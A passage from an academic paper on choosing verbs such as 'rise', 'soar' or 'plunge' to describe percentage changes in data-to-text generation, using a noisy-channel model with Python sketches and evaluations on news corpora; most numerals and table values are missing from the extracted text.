cal- culate the interquartile range (iqr) of its associated percentage changes in the corpus. given a new per- centage change, their method randomly selects a verb from those verbs whose iqrs cover the percentage in question, with equal probabilities. a crowdsourcing based evaluation has demonstrated the superiority of their verb selection method to the random baseline that just chooses verbs completely randomly. it is notable that their method has been incorporated into thomson reuters eikontm, their commercial data- to-text nlg software product for macro-economic indicators and mergers-and-acquisitions deals (pla- chouras et al., ). we will make experimental comparisons between our proposed approach and theirs in section . data . the wsj corpus the first (and main) dataset that we have used to investigate the problem of verb selection is bllip - wall street journal (wsj) corpus release which contains a three-year wall street journal (wsj) collection of , stories from acl/dci (ldc t ), approximately million words (char- niak et al., ). we first utilized the stanford corenlp (manning et al., ) toolkit to extract “relation triples” from all the documents in the dataset, via its open-domain information extraction (openie) functionality. then, with the help of part-of-speech (pos) tagging pro- vided by the python package nltk (bird et al., ), we filtered the extracted relation triples and retained only those expressing a percentage change https://stanfordnlp.github.io/corenlp/ http://www.nltk.org/ in the following format: google’s revenue︸ ︷︷ ︸ subject rose︸ ︷︷ ︸ verb . %︸ ︷︷ ︸ percentage . 
here the numerical value of percentage change could be written using either the symbol % or the word percent. note that all auxiliary verbs (including modal verbs) would have been removed, and lemma- tization (manning et al., ; jurafsky and martin, ) would have been applied to all main verbs so that the different inflectional forms of the same verb would be reduced to their common base form. after extracting , candidate triples for a to- tal of , verbs, we eliminated rare verbs which occur less than times in the dataset. furthermore, we manually annotated the direction of each verb as upward or downward, and discarded the verbs like yield which do not indicate the direction of per- centage change. the above preprocessing left us with (normalized) verbs of which are upward and are downward. there are , verb-percentage pairs in total. furthermore, it is found that most of the per- centage changes in this dataset reside within the range [ %, %]. only a tiny portion of percentage changes are beyond that range: . % for upward verbs and . % for downward verbs. those out-of- range percentage changes are considered outliers and are excluded from our study in this paper, though the way to relax this constraint will be discussed later in section . . the reuters corpus we have also validated our model in a widely-used public dataset, the reuters- text categorization collection . it is a collection of , documents that appeared on reuters newswire in . the doc- uments were assembled and indexed with categories, but they were not needed in this paper. the same preprocessing as on the wsj corpus has been applied to this dataset, except that the minimum occurring frequency of verbs was not but times due to the smaller size of this dataset. after manual annotation and filtering, we ended up with verbs in- cluding upward ones and downward ones. there are verb-percentage pairs in total. https://goo.gl/nrofu . the chinese corpus furthermore, to verify the effectiveness of our ap- proach in other languages, we have also made use of the chinese gigaword ( th edition) dataset. it is a comprehensive archive of newswire text data that has been acquired from eight distinct sources of chinese newswire by ldc over a number of years (ldc t ), and contains more than million sentences. since we could not find any open-domain infor- mation extraction toolkit for “relation triples” in chi- nese, we resorted to regular expression matching to extract, from chinese sentences, the expressions of percentage together with their local contexts. a num- ber of regular expression patterns have been utilized to ensure that they could cover all the different ways to write a percentage in chinese. then, after pos tagging, we would be able to identify the verb imme- diately preceding each percentage if it is associated with one. for our application, a big difference between chi- nese and english is that the available choices of verbs to express upward or downward percentage changes are pretty limited in chinese: the variation in fact mostly comes from the adverb used together with the verb. therefore, when we talk about the prob- lem of chinese verb selection in this paper, we ac- tually mean the choice of not just verbs but instead adverb+verb combinations, e.g., 狂升 (rise crazily) and 略降 (fall slightly). our proposed probabilistic model for verb selection, described below in sec- tion , can be extended straightforwardly to such generalized chinese “verbs”. 
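to make the preprocessing for the english corpora concrete, the normalization of extracted triples into (verb, percentage) pairs described above can be sketched roughly as follows. this is our own simplified stand-in for the corenlp-plus-nltk pipeline, not the released code: the helper name, the regular expression, and the auxiliary-verb list are ours, and full pos tagging of the relation phrase is replaced by a simple lexical filter.

```python
import re
from nltk.stem import WordNetLemmatizer

# a crude stand-in for the triple filtering described above (names are ours)
PERCENT = re.compile(r'(\d+(?:\.\d+)?)\s*(?:%|percent\b)', re.IGNORECASE)
AUXILIARIES = {'be', 'is', 'are', 'was', 'were', 'been', 'have', 'has', 'had',
               'do', 'does', 'did', 'will', 'would', 'may', 'might',
               'can', 'could', 'shall', 'should', 'must'}
lemmatizer = WordNetLemmatizer()          # needs the nltk 'wordnet' data package

def triple_to_pair(subject, relation, obj):
    """map ("google's revenue", "had jumped", "12.3 %") to ('jump', 12.3);
    return None if the object does not express a percentage change."""
    match = PERCENT.search(obj)
    if match is None:
        return None
    percentage = float(match.group(1))
    # drop auxiliary/modal verbs from the relation phrase and keep the main verb
    tokens = [t for t in relation.lower().split() if t not in AUXILIARIES]
    if not tokens:
        return None
    lemma = lemmatizer.lemmatize(tokens[-1], pos='v')   # 'jumped' -> 'jump', 'rose' -> 'rise'
    return lemma, percentage

print(triple_to_pair("google's revenue", "rose", "12.3 %"))   # ('rise', 12.3)
```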
similar to the preprocessing of the other datasets, rarely occurring verbs with frequency less than would have been filtered out. in the end, we got chinese verbs of which are upward and are downward. there are , verb-percentage pairs in total.

approach

in this section, we propose to formulate the task of verb selection for data-to-text nlg (see section ) as a supervised learning problem (hastie et al., ) and to address it using shannon's noisy-channel model (shannon, ). for each of the two possible change directions (upward and downward), we need to build a specific model. without loss of generality, in the subsequent discussion, we focus on selecting the verbs of one particular direction; the way to deal with the other direction is exactly the same. thus a percentage change is fully specified by its magnitude in one model. the set-up of our supervised learning problem is as follows. suppose that we have a set of training examples d = {(x_1, w_1), . . . , (x_N, w_N)}, where each example consists of a percentage change x_i paired with the verb w_i used by the human author to express that percentage change. such training data could be obtained from a large corpus as described in section . let x denote the set of possible percentage changes: as mentioned earlier, in this paper we assume that x = [ %, %]. let v denote the set of possible verbs, i.e., the vocabulary. our task is to learn a predictive function f : x → v that can map any given percentage change x to an appropriate verb w = f(x). apparently, there is inherent uncertainty in the above described process of predicting the choice of verbs for a percentage change. making use of probabilistic reasoning, the principled approach to handling uncertainties, we argue that the function f should be determined by the posterior probability p(w|x). however, it looks difficult to directly estimate the parameters of such a conditional model, i.e., a discriminative model, for every possible value of x, which is a continuous variable. hence, we turn to the easier alternative way often used in machine learning: to construct a generative model. rather than directly estimating the conditional probability distribution, we instead estimate the joint probability p(x,w) over (x,w) pairs in the generative model. the joint probability can be decomposed as follows:

p(x, w) = \underbrace{p(w)}_{\text{prior}} \, \underbrace{p(x \mid w)}_{\text{likelihood}} , ( )

where p(w) is the prior probability distribution over verbs w, and p(x|w) is the likelihood, i.e., the probability of seeing the percentage change x given that the associated verb is w. the benefit of making the above decomposition is that the parameters of p(w) and p(x|w) can be estimated separately. given such a generative model, we can then use bayes' rule to derive the posterior probability p(w|x) for any new example x:

p(w \mid x) = \frac{p(w)\, p(x \mid w)}{p(x)} , ( )

where

p(x) = \sum_{w \in v} p(x, w) = \sum_{w \in v} p(w)\, p(x \mid w) ( )

is the model evidence acting as the normalizing constant in the formula. intuitively, this generative model could be considered as a noisy channel (shannon, ). when we see a percentage change x, we can imagine that it has been generated in two steps (raviv, ). first, a verb w would be chosen with the prior probability p(w). second, the verb w would be passed through a communication "channel" and be corrupted by the "noise" to produce the percentage change x according to the likelihood function (aka the channel model) p(x|w). in other words, the percentage change x that we see is actually the distorted form of its associated verb w.
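as a concrete illustration of this two-step generative story, the following toy sketch scores and samples verbs from the posterior of eq. ( ). the vocabulary, the prior, and the beta likelihood parameters are invented for illustration only (they are not values fitted from the corpora), and percentage changes are assumed to be rescaled to fractions in (0, 1).

```python
import numpy as np
from scipy.stats import beta

# toy vocabulary with a hand-picked prior p(w) and a beta likelihood p(x|w) per verb;
# all numbers below are made up for the sketch, not fitted from the corpora.
PRIOR = {'rise': 0.55, 'climb': 0.20, 'jump': 0.15, 'soar': 0.10}
LIKELIHOOD = {'rise': (1.2, 9.0), 'climb': (1.5, 8.0),
              'jump': (2.0, 4.0), 'soar': (3.0, 2.5)}   # (alpha, beta) parameters

def posterior(x):
    """p(w|x) for every verb, via bayes' rule with explicit normalization."""
    joint = {w: PRIOR[w] * beta.pdf(x, *LIKELIHOOD[w]) for w in PRIOR}
    evidence = sum(joint.values())            # p(x), the normalizing constant
    return {w: p / evidence for w, p in joint.items()}

def select_verb(x, rng=np.random.default_rng(0)):
    """sample a verb from p(w|x) rather than taking the argmax, to keep variety."""
    post = posterior(x)
    verbs = list(post)
    return rng.choice(verbs, p=[post[w] for w in verbs])

print(posterior(0.02))     # a small change: most of the mass on 'rise'/'climb'
print(select_verb(0.45))   # a large change: usually 'soar' or 'jump'
```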
an alternative, but equivalent, interpretation is that when a pair (x,w) is passed through the noisy- channel, the verb w will be lost and finally only the percentage change x will be seen. the task is to recover the lost w based on the observed x. shannon’s noisy-channel model is in fact a kind of bayesian inference. it has been applied to many nlp tasks such as text categorization, spell checking, question answering, speech recognition, and machine translation (jurafsky and martin, ). our appli- cation — probabilistic verb selection — is different from them because the observed data are continu- ous real-valued numbers but not discrete symbols. more importantly, in most of those applications such as text categorization using the naı̈ve bayes algo- rithm (manning et al., ), the objective is “decod- ing”, i.e., to find the single most likely label w∗ for any given input x from the model w∗ = arg max w∈v p(w|x) = arg max w∈v p(w)p(x|w)/p(x) = arg max w∈v p(w)p(x|w) , ( ) and therefore the normalizing constant p(x) does not need to be calculated. however, this is actually undesirable for the task of verb selection, because it implies that the a percentage change x would always be expressed by the same “optimal” verb w∗ corre- sponding to it. to achieve variation and naturalness, we must maintain the diversity of word usage. so the right method to generate a verb w for the given percentage change x is to compute the posterior prob- ability distribution p(w|x) over all the possible verbs in the vocabulary v using eq. ( ) and then randomly sample a verb from that distribution. although this means that the normalizing constant p(x) needs to be calculated each time, the computation is still effi- cient, as unlike in many other applications the vocab- ulary size |v| is a quite small number in practice (see section ). in the following two subsections, we study the two components of our proposed probabilistic model for verb selection, the prior probability distribution and the likelihood function, respectively. . prior the prior probability distribution p(w) could sim- ply be obtained by maximum likelihood estimation (mle): p(w)mle = nw/n , ( ) where nw is the number of training examples with the verb w, and n is the total number of training examples. the relationship between a verb’s rank and fre- quency in the wsj corpus is depicted by the log-log plot fig. , revealing that the empirical distribution of verbs follows the zipf ’s law (powers, ), which is related to the power law (adamic, ; newman, ). specifically, the frequency of the i-th popular verb, fi, is proportional to /is, where s is the ex- ponent characterizing the distribution (shown as the slope of the straight line in the corresponding log-log plot). this implies that in the context of expressing percentage changes, the human choice of verbs is dominated by a few frequently used ones, and many other verbs are only used very occasionally. smoothing: if we would like to intentionally boost the diversity of verb choices, we could mitigate the high skewness of the empirical distribution of verbs by smoothing (zhai and lafferty, ). a simple smoothing technique suitable for this purpose is the jelinek-mercer smoothing (jelinek and mercer, ) . . . . . . log(rank) lo g( fre q) (a) upward verbs . . . . . . log(rank) lo g( fre q) (b) downward verbs figure : the empirical distribution of verbs p(w)mle follows the zipf’s law, in the wsj corpus. 
which uses a linear interpolation between the maxi- mum likelihood estimation of a verb w’s prior proba- bility distribution with the uniform distribution over the vocabulary of verbs v, i.e., p(w) = λp(w)mle + ( −λ) |v| , ( ) where p(w)mle is given by eq. ( ), and the parame- ter λ ∈ [ , ] provides a means to explicitly control the trade-off between accuracy and diversity. the smaller the parameter λ is, the more diverse the gen- erated verbs would be. when λ = , the prior prob- ability is completely ignored and the selection of a verb solely depends on how compatible the verb is with the given percentage change. when λ = , it backs off to the original model without smoothing. the optimal value of the parameter λ could be tuned on a development set (see section . ). . likelihood for each verb w ∈v, we analyze the distribution of its associated percentage changes and calculate the following descriptive statistics: mean, standard devi- ation (std), skewness, kurtosis, median, and interquar- tile range (iqr). all those descriptive statistics for the wsj corpus are given in table . in addition, fig. shows the box plots of percentage changes for top- (most frequent) verbs in the wsj corpus, where the rectangular box corresponding to each verb represents the span from the first quartile to the third quartile, i.e., the interquartile range (iqr), with the segment inside the box indicating the median and the whiskers outside the box indicating the rest of the distribution (except for the points that are determined to be “outliers” using the so-called tukey box plot method). it can be seen that the choice of verbs often im- ply the magnitude of percentage change: some verbs (such as soar and plunge) are mostly used to ex- press big changes (large medians), while some verbs (such as advance and ease) are mostly used to express small changes (small medians). generally speaking, the former is associated with a relatively wide range of percentage changes (large iqrs) while the latter is associated with a relatively narrow range of percentage changes (small iqrs). moreover, it is interesting to see that for almost all the verbs, the distribution of percentage changes is heavily skewed to the left side (i.e., smaller changes). given a new percentage change x, in order to cal- culate its probability of being generated from a verb w in the above described generative model, we need to fit the likelihood function, i.e., the probability dis- tribution p(x|w), for each word w ∈ v, based on the training data. one common technique for this purpose is kernel density estimation (kde) (hastie et al., ), a non- parametric way to estimate the probability density function as follows: p(x|w) = nwh nw∑ i= k ( x−xi h ) , ( ) verbs mean std skewness kurtosis median iqr upward rise . . . . . [ . , . ] increase . . . . . [ . , . ] grow . . . . . [ . , . ] climb . . . . . [ . , . ] jump . . . - . . [ . , . ] surge . . . - . . [ . , . ] gain . . . . . [ . , . ] soar . . . - . . [ . , . ] raise . . . . . [ . , . ] advance . . . . . [ . , . ] boost . . . . . [ . , . ] downward fall . . . . . [ . , . ] decline . . . . . [ . , . ] drop . . . . . [ . , . ] slip . . . . . [ . , . ] plunge . . . - . . [ . , . ] slide . . . - . . [ . , . ] lose . . . . . [ . , . ] tumble . . . . . [ . , . ] plummet . . . - . . [ . , . ] ease . . . . . [ . , . ] decrease . . . . . [ . , . ] reduce . . . . . [ . , . ] dip . . . . . [ . , . ] shrink . . . . . [ . , . 
] table : the descriptive statistics of percentage changes (in %) for each verb, in the wsj corpus. percent rise increase climb grow gain jump soar surge raise advance ve rb (a) upward verbs percent fall decline drop tumble slip lose plunge ease slide plummet ve rb (b) downward verbs figure : the box plots of percentage changes (in %) for the top- verbs, in the wsj corpus. where nw is the number of training examples with the verb w, k(·) is the kernel (a non-negative func- tion that integrates to one and has mean zero), and h > is a smoothing parameter called the bandwidth. fig. shows the likelihood function p(x|w) fitted by kde with gaussian kernels and automatic band- width determination using the rule of scott ( ), for the most popular upward and downward verbs in the wsj corpus: rise and fall. it is also possible to fit a parametric model of p(x|w) which would be more efficient than kde. since in this paper x is assumed to be a continuous random variable within the range [ %, %] (see section ), we choose to fit p(x|w) with the beta . . . . . (a) the verb rise . . . . . (b) the verb fall figure : the likelihood function p(x|w) fitted by kernel density estimation (kde). . . . . . (a) the verb rise . . . . . (b) the verb fall figure : the likelihood function p(x|w) fitted by the beta distribution. distribution which is a continuous distribution sup- ported on the bounded interval [ , ]: p(x|w) = beta(α,β) = Γ(α + β) Γ(α)Γ(β) xα− ( −x)β− . ( ) although there exist a number of continuous dis- tributions supported on the bounded interval such as the truncated normal distribution, the beta dis- tribution is picked here as it has the ability to take a great variety of different shapes using only two parameters α and β. these two parameters can be es- timated using the method of moments, or maximum likelihood. for example, using the former, we have α̂ = x̄ ( x̄( −x̄) v̄ − ) and β̂ = ( −x̄) ( x̄( −x̄) v̄ − ) if v̄ < x̄( − x̄), where x̄ and v̄ are the sample mean and sample variance respectively. fig. shows the likelihood function p(x|w) fitted by the beta dis- tribution using scipy for the most popular upward and downward verbs in the wsj corpus: rise and fall. experiments . baselines thomson reuters: the only published approach that we are aware of to this specific task of verb selec- tion in the context of data-to-text nlg is the method adopted by thomson reuters eikontm (smiley et al., ). this baseline method’s effectiveness has been verified through crowdsourcing, as we have mentioned before (see section ). furthermore, it is fairly new (published in ), therefore should https://www.scipy.org/ represent the state of the art in this field. note that their model was not taken off-the-shelf but re-trained on our datasets to ensure a fair comparison with our approach. neural network: another baseline method that we have tried is a feed-forward artificial neural net- work with hidden layers, aka, a multi-layer percep- tron (russell and norvig, ; goodfellow et al., ). it is because neural networks are well-known universal function approximators, and they represent quite a different family of supervised learning algo- rithms. unlike our proposed probabilistic approach which is essentially a generative model, the neural network used in our experiments is a discrimina- tive model which takes the percentage change in- put (represented as a single floating-point number) and then predicts the verb choice directly. 
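for concreteness, the method-of-moments fit of the beta likelihood and the jelinek-mercer smoothing of the prior described in the previous section can be sketched as follows. this is our own rough re-implementation rather than the authors' released code; it assumes percentage changes rescaled to fractions in (0, 1), the default smoothing weight is arbitrary (the paper tunes it on a development set), and the example data are made up.

```python
import numpy as np
from scipy.stats import gaussian_kde   # kde alternative: gaussian_kde(xs) uses scott's rule

def fit_beta_moments(xs):
    """method-of-moments estimates (alpha, beta) from samples xs in (0, 1);
    only valid when the sample variance is below mean * (1 - mean)."""
    m, v = np.mean(xs), np.var(xs)
    common = m * (1.0 - m) / v - 1.0
    return m * common, (1.0 - m) * common

def smoothed_prior(counts, lam=0.1):
    """jelinek-mercer smoothing: interpolate the mle prior with a uniform prior."""
    n = float(sum(counts.values()))
    v = len(counts)
    return {w: lam * c / n + (1.0 - lam) / v for w, c in counts.items()}

# made-up example: percentage changes (as fractions) observed with the verb 'jump'
alpha_hat, beta_hat = fit_beta_moments(np.array([0.08, 0.12, 0.25, 0.31, 0.18]))
print(alpha_hat, beta_hat)
print(smoothed_prior({'rise': 120, 'jump': 25, 'soar': 5}, lam=0.1))
```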
since we would like to have probability estimates for each verb, the softmax function was used for the output layer of neurons, and the network was trained via back-propagation to minimize the cross-entropy loss function. an l regularization term was also added to the loss function that would shrink model param- eters to prevent overfitting. the activation function was set to the rectified linear unit (relu) (hahn- loser et al., ). the adam optimization algo- rithm (kingma and ba, ) was employed as the solver, with the samples shuffled after each iteration. the initial learning rate was set to . , and the maximum number of iterations (epochs) was set to . for our datasets, a single hidden layer of neurons would be sufficient and adding more neu- rons or layers could not help. this was found using the development set through a line search from to hidden neurons with step size . note that when applying the trained neural network to select verbs, we should use not argmax but sampling from the predicted probability distribution (given by the softmax function), in the same way as we do in our proposed probabilistic model (see section ). . code the python code for our experiments, along with the datasets of verb-percentage pairs extracted from those three corpora (see section ), have been made available to the research community . https://goo.gl/gkj fa . automatic evaluation the end users’ perception of a verb selection algo- rithm’s quality depends on not only how accurately the chosen verbs reflect the corresponding percent- age changes but also how diverse the chosen verbs are, which are two largely orthogonal dimensions for evaluation. accuracy: the easiest way to assess the accuracy of an nlg method or system is to compare the texts generated by computers and the texts written by hu- mans for the same input data (mellish and dale, ; reiter and belz, ), using an automatic metric such as bleu (papineni et al., ). for our task of verb selection, we decide to use the metric mrr that stands for mean reciprocal rank (voorhees, ; radev et al., ) and can be calculated as follows: mrr = |q| ∑ (x′i,w ′ i)∈q rank(w′i) , ( ) where q = {(x′ ,w′ ), . . . , (x′m,w′m )} is the set of test examples, and rank(w′i) refers to the rank po- sition of w′i — the verb really used by the human author to describe the percentage change x′i — in the list of predicted verbs ranked in the descending order of their probabilities of correctness given by the model. the mrr metric is most widely used for the evaluation of automatic question answering which is similar to automatic verb selection in the following sense: they both aim to output just one suitable response (answer or verb) to any given input (question or percentage change). through -fold cross-validation (hastie et al., ), we have got the mrr scores of our proposed model (see section ) and the two baseline mod- els (see section . ) which are shown in table . the models were trained/tested separately on each dataset (see section ). in each round of -fold cross- validation, % of the data would become the test set; in the remaining % of the data, randomly selected % would be the training set and the other % would be the development set if parameter tuning is needed (otherwise the whole % would be used for training). the parameter λ of our model controls the strength of smoothing over the prior probability (see sec- tion . ) and thus dictates the trade-off between ac- curacy and diversity. 
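the two baselines described above can be approximated roughly as follows. this is a sketch rather than the authors' code: scikit-learn's MLPClassifier stands in for the neural network, the hidden-layer size and other hyperparameter values shown are placeholders, and training pairs are assumed to be (verb, percentage) tuples with the percentage as a single real-valued feature.

```python
import numpy as np
from sklearn.neural_network import MLPClassifier

def fit_iqr_table(pairs):
    """thomson-reuters-style baseline: interquartile range of x for each verb."""
    table = {}
    for verb in {w for w, _ in pairs}:
        xs = np.array([x for w, x in pairs if w == verb])
        table[verb] = (np.percentile(xs, 25), np.percentile(xs, 75))
    return table

def iqr_select(x, table, rng=np.random.default_rng()):
    """pick uniformly at random among the verbs whose iqr covers x."""
    candidates = [w for w, (q1, q3) in table.items() if q1 <= x <= q3]
    return rng.choice(candidates) if candidates else None

def fit_mlp(pairs):
    """feed-forward baseline: one real-valued input feature, softmax over verbs."""
    x_train = np.array([[x] for _, x in pairs])
    y_train = np.array([w for w, _ in pairs])
    clf = MLPClassifier(hidden_layer_sizes=(16,), activation='relu', solver='adam',
                        alpha=1e-4, learning_rate_init=1e-3, max_iter=200, shuffle=True)
    return clf.fit(x_train, y_train)

def mlp_select(x, clf, rng=np.random.default_rng()):
    """sample from the predicted softmax distribution instead of taking the argmax."""
    probs = clf.predict_proba(np.array([[x]]))[0]
    return rng.choice(clf.classes_, p=probs)
```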
if we focus on the accuracy corpus method upward verbs downward verbs wsj thomson reuters . ± . . ± . neural network . ± . . ± . our approach (λ = , kde) . ± . . ± . our approach (λ = , beta) . ± . . ± . our approach (λ = . , kde) . ± . . ± . our approach (λ = . , beta) . ± . . ± . reuters thomson reuters . ± . . ± . neural network . ± . . ± . our approach (λ = , kde) . ± . . ± . our approach (λ = , beta) . ± . . ± . our approach (λ = . , kde) . ± . . ± . our approach (λ = . , beta) . ± . . ± . chinese thomson reuters . ± . . ± . neural network . ± . . ± . our approach (λ = , kde) . ± . . ± . our approach (λ = , beta) . ± . . ± . our approach (λ = . , kde) . ± . . ± . our approach (λ = . , beta) . ± . . ± . table : the accuracy of verb selection measured by mrr (mean±std) via -fold cross-validation. only and ignore the diversity, the optimal value of λ should just be (i.e., no smoothing). in order to strike a healthy balance between accuracy and diver- sity, we carried out a line search for the value of λ from to with step size . using the development set. it turned out that the smoothing effect upon diver- sity would only become noticeable when λ ≤ . , so we further conducted a line search from to . with step size . , and found that using λ = . consis- tently yield a good performance on different corpora. actually, this phenomenon should not be very sur- prising, given the zipfian distribution of verbs which is highly skewed (see fig. ). our observation in the experiments still indicate that smoothing with a none-zero λ worked better than setting λ = . that is to say, it would not be wise to go to extremes to ignore the prior entirely which would unnecessarily harm the accuracy. an alternative smoothing solution for mitigating the severe skewness of the empirical prior that we also considered is to make the smoothed prior probability proportional to the logarithm of the raw prior probability, but we did not take that route as (i) we could not find a good principled interpreta- tion for such a trick and; (ii) using a small λ value like . seemed to work sufficiently well. it will be shown later that sampling verbs from the posterior probability distribution rather than just using the one with the maximum probability would help to alleviate the problem of prior skewness and thus prevent verb selection from being dominated by the most popular verbs. it can be observed from the experimental results that smoothing (see section . ) does reduce the accuracy of verb selection. the mrr scores with λ = . are lower than those with λ = . nev- ertheless, as we shall soon see, strong smoothing is crucially important for achieving a good level of diversity. furthermore, there seemed to be little per- formance difference between the usage of the kde technique or the beta distribution to fit the likelihood function in our approach. this suggests that the latter is preferable because it is as effective as the former but much more efficient. therefore, in the remaining part of this paper, we shall focus on this specific ver- sion of our model (with λ = . , beta) even though it may not be the most accurate. the mrr scores achieved by our approach are around . – . which implies that, on average, the first or the second verb selected by our approach would be the “correct” verb used by human authors. 
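for reference, the mrr metric defined above boils down to the following computation, where rank_verbs(x) stands for whatever model is being evaluated (for instance, verbs sorted by the posterior p(w|x) of the toy sketch given earlier), best first:

```python
def mean_reciprocal_rank(test_pairs, rank_verbs):
    """test_pairs: iterable of (x, w_true); rank_verbs(x): list of verbs, best first.
    mrr = (1 / |Q|) * sum over test examples of 1 / rank(w_true)."""
    total, count = 0.0, 0
    for x, w_true in test_pairs:
        ranking = rank_verbs(x)
        total += 1.0 / (ranking.index(w_true) + 1)   # ranks are 1-based
        count += 1
    return total / count

# e.g., with the toy posterior sketched earlier:
# def rank_verbs(x):
#     post = posterior(x)
#     return sorted(post, key=post.get, reverse=True)
```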
across all the three corpora, our proposed proba- bilistic model, whether it is smoothed or not, whether it uses the kde technique or the beta distribution, outperforms the thomson reuters baseline by a large margin in terms of mrr. according to the wilcoxon signed-rank test (wilcoxon, ; kerby, ), the performance improvements brought by our approach over the thomson reuters baseline are statistically significant with the (two-sided) p-value � . on the two english corpora and = . on the chinese corpus. with respect to the neural network baseline, on all the three corpora, its accuracy is slightly better than that of our smoothed model (λ = . ) though it still could not beat our original unsmoothed model (λ = ). the major problem with the neural net- work baseline is that, similar to the probabilistic model without smoothing, its verb choices would concentrate on the most frequent ones and thus have very poor diversity. a prominent advantage of our proposed probabilistic model, in comparison with discriminative learning algorithms such as the neural network baseline, is that we are able to explicitly control the trade-off between accuracy and diversity by adjusting the strength of smoothing. it is worth emphasizing that the accuracy of a verb selection method only reflects its ability to imitate how writers (journalists) use verbs, but this is not necessarily the same as how readers interpret the verbs. usually the ultimate goal of an nlg sys- tem is to successfully communicate information to readers. previous research in nlg and psychology suggests that there is wide variation in how different people interpret verbs and words in general, which is probably much larger in the general population than amongst journalists. specifically, the mrr metric would probably underestimate the effectiveness of a verb selection method, since a verb different from the one really used by the writer is not necessarily a less appropriate choice for the corresponding percentage change from the reader’s perspective. diversity: other than the accuracy of reproducing the verb choices made by human authors, verb selec- tion methods could also be automatically evaluated in terms of diversity. following kingrani et al. ( ), we borrow the diversity measures from ecology (magurran, ) to quantitatively analyze the diversity of verb choices: each specific verb is considered as a particular species. when measuring the biological diversity of a habitant, it is important to consider not only the number of distinct species present but also the rela- tive abundance of each species. in the literature of ecology, the former is called richness and the latter is called evenness. here we utilize the well-known inverse simpson index aka simpson’s reciprocal in- dex (simpson, ) which takes both richness and evenness into account: d = (∑r i= p i )− , where r is the total number of distinct species (i.e., rich- ness), and pi is the the proportion of the individuals belonging to the i-th species relative to the entire population. the evenness is given by the value of diversity normalized to the range between and , so it can be calculated as d/r. table shows the diversity scores of verb choices made by our approach and the thomson reuters base- line for randomly sampled percentage changes (see section . ). overall, in terms of diversity, our approach would lose to thomson reuters. the neu- ral network baseline is omitted here because its di- versity scores were very low. discussion: figs. 
and show the confusion ma- trices of our approach (λ = . , beta) on the wsj corpus as (row-normalized) heatmaps: in the former we choose the verb with the highest posterior proba- bility (argmax) while in the latter we sample the verb from the posterior probability distribution (see sec- tion ). the argmax way would be dominated by a few verbs (e.g., “rise”, “soar”, “fall”, and “plummet”). in contrast, random sampling would lead to a much wider variety of verbs. the experimental results of all verb selection methods reported in this paper are generated by the sampling strategy, if not indicated otherwise. it can be seen from fig. that the verbs “soar” and “plunge” are the easiest to be predicted. generally speaking, the prediction of verbs is rela- tively more accurate for bigger percentage changes, whether upwards or downwards. this is probably be- cause there are fewer verbs available to describe such radical percentage changes (see fig. ) and thus the model faces less uncertainty. most misclassification (confusion) happens when a verb is incorrectly pre- dicted to be the most frequent one (“rise” or “fall”). . human evaluation the two aspects, accuracy and diversity, are both im- portant for the task of verb selection. although we have shown that automatic evaluation could be car- ris e in cr ea se gr ow cl im b ju m p su rg e ga in so ar ra is e ad va nc e bo os t rise increase grow climb jump surge gain soar raise advance boost . . . . . . (a) upward verbs fa ll de cl in e dr op sl ip pl un ge sl id e lo se tu m bl e pl um m et ea se de cr ea se re du ce di p sh rin k fall decline drop slip plunge slide lose tumble plummet ease decrease reduce dip shrink . . . . . (b) downward verbs figure : the confusion matrix heatmap of our approach on the wsj corpus: choosing the verb with the highest posterior probability. ris e in cr ea se gr ow cl im b ju m p su rg e ga in so ar ra is e ad va nc e bo os t rise increase grow climb jump surge gain soar raise advance boost . . . . . (a) upward verbs fa ll de cl in e dr op sl ip pl un ge sl id e lo se tu m bl e pl um m et ea se de cr ea se re du ce di p sh rin k fall decline drop slip plunge slide lose tumble plummet ease decrease reduce dip shrink . . . . . . (b) downward verbs figure : the confusion matrix heatmap of our approach on the wsj corpus: sampling the verb from the posterior probability distribution. corpus method upward verbs downward verbs richness evenness diversity richness evenness diversity wsj our approach . . . . thomson reuters . . . . reuters our approach . . . . thomson reuters . . . . chinese our approach . . . . thomson reuters . . . . table : the diversity of verb selection measured by the inverse simpson index. corpus verbs our approach vs thomson reuters our approach vs neural network > < ≈ p-value > < ≈ p-value wsj upward . . downward . . both . . reuters upward . . downward . . both . . chinese upward . � . downward . . both . � . all both . � . table : the results of human evaluation, where the p-values are given by the sign test (two-sided). ried out for either accuracy or diversity alone, there is no obvious way to assess the overall effectiveness of a verb selection method using machines only. the ultimate judgment on the quality of verb selection would have to come from human assessors (mellish and dale, ; reiter and belz, ; smiley et al., ). to manually compare our approach (the version with λ = . 
, beta) with a baseline method (thom- son reuters or neural network), we conduct a ques- tionnaire survey with multiple-choice questions. in each question, a respondent would see a pair of generated sentences describing the same percentage change with the verbs selected by two different meth- ods respectively and need to judge which one sounds better than the other (or it is hard to tell). for exam- ple, a respondent could be shown the following pair of generated sentences: ( ) net profit declines % ( ) net profit plummets % and then they were supposed to choose one of the three following options as their answer: [a] sentence ( ) sounds better. [b] sentence ( ) sounds better. [c] they are equally good. the respondents would be blinded to whether the first verb or the second verb was provided by our proposed method, as their appearing order would have been randomized in advance. the questionnaire survey system withheld the information about the source of each verb until the answers from all respondents had been collected, and then it would count how many times the verb selected by our proposed method was deemed better than (>), worse than (<), or as good as (≈) the verb selected by the baseline method. for each corpus, we produced different ques- tions, of which half were about upward verbs and half were about downward verbs. as we have explained above, each question compares a pair of generated sentences describing the same percentage change with different verbs. the sentence generation process is the same as that used by smiley et al. ( ). the subjects were randomly picked from the most popular ones in the corpus (e.g., “gross domestic product”), and the percentage changes (as the objects) were ran- domly sampled from the corpus as well. each of the two verb selection methods, in comparison, would provide one verb (as the predicate) for describing that specific percentage change. note that in this sentence generation process, a pair of sentences would be re- tained only if the verbs selected by the two methods were different, as it would be meaningless to compare two identical sentences. a total of college-educated people participated in the questionnaire survey. they are all bilingual, i.e., native or fluent speakers of both english and chinese. each person was given questions: questions (including upward and downward ones) from each corpus. we (the authors of this paper) were excluded from participating in the questionnaire survey to avoid any conscious or unconscious bias. the results of human evaluation are shown in ta- ble . altogether, respondents prefer the verb se- lected by our approach / = % of times, as opposed to / = % for the thomson reuters baseline; respondents prefer the verb selected by our approach / = % of times, as opposed to / = % for the neural network baseline. according to the sign test (wackerly et al., ), our approach works significantly better than the two baseline methods, thomson reuters and neural net- work: overall the (two-sided) p-values are less than . . discussion: our approach exhibits more superior- ity over the thomson reuters baseline on the english datasets than on the chinese dataset. since the chi- nese dataset is bigger than the reuters dataset, though smaller than the wsj dataset, the performance differ- ence is not caused by corpus size but due to language characteristics. remember that for chinese we are actually predicting adverb+verb combinations (see section . ). 
